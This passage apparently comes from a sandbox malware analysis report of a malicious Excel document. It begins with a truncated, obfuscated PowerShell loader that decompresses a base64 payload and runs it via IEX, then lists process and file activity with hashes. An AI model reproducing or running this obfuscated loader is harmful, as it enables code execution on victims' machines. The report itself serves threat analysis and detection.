bzE5wHT26Wfu/J8MmHmmtm0Lzkr/Nlpp7qQRd69DaGjWBIIhermbuoMxGwewhB1egax0GSu7ME9OXZvwwbA8XPyP+tFljg5BIzppqMbOY0nU3z1u/hcwqBnS8na6pb7oSNW2/m4xis4xpMw1L0Vp9SQU5Y9LIBbhhiqUg9qU0Cn+TwAWJuPZBO2mR58POAhyHZTO1NfKrNcPouzrHpL9jpmMac9US/I1+hTukO4olKPqE53m57EeyWf5FMdFgeqFZClETypfW2+x6xHsW7OIRU/5zfycSw9hzYKdwlreTbSCaccCE/Lz3oWPMHJWSraC3ROfFs+zHjljDYfaV1uIFK9zUKbWSCf1IgssNMS7SXo3V9b6uokay0SbsiTqodF+MPP7IqqLzdkMB/Dh3H5CO29IaDH1GHlLdqkGKJfkBXJyHyuGt694apf1H0hv2094Vqe7OxVZt8+Vyy/Hc+bLvqqHuLmM9ztDF57VY8ed7EofQwHU/P7nc95vx4msahcVNwun4cf+v4odFY2sbORFOH/MbdpzXXlcp4dvZ7gTjTzQ6N0pDDSzK21AYoXQTX5mHA8n+1H1JkC8ddKQVTZ3N6k6ZslOUiZ4j7p8nHUOUg18iwrPUYxGsFtJ5ftFy3Mo/UT7nY74MlHl9HPDTSrYRqHmM/uX3LDyhJCqD3kX3Gr1b7+73/88Nff//Z3f/jbX/7tj7//92/lf8qXP/3uD7/98af7vx/+8t9//uu3n7777p9/+Pn7b21/+fI3//p33375p28//vyXf/jytXy9/r58/fr1/8r969f/Bw==' ) ${7HE} [iO.COmpREsSiON.compRESSiOnMode]::decOmprEsS)|% {Re io.STreAMrEADeR( `$_ ${7HE} [texT.ENcodInG]::utf8 ) } ).rEADtoeNd( )"\" |ieX | C:\Windows\System32\WindowsPowerShell\v1.0\POWeRsHEll.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2896 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRAE94.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2588 | POWeRsHEll.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JFG2GNFO0DHTR4ETNHLK.temp | — | |
MD5:— | SHA256:— | |||
2896 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF9E886044445B8031.TMP | — | |
MD5:— | SHA256:— | |||
2896 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Forms\MSComctlLib.exd | tlb | |
MD5:01BCF68BC6BA43DE23039809BF3F03C6 | SHA256:D8AC27F0730541D5A61C13B737E205352C555970B9C477787CBC27A4A80656CE | |||
2588 | POWeRsHEll.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 | |||
2588 | POWeRsHEll.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF176e3a.TMP | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 | |||
2896 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:58F5D0F07A476EE6435D289739D04FDE | SHA256:4FC8F33F708617918A773BF7E78BA02248574BCD244B0B85E9D398BB5F3FB8BA |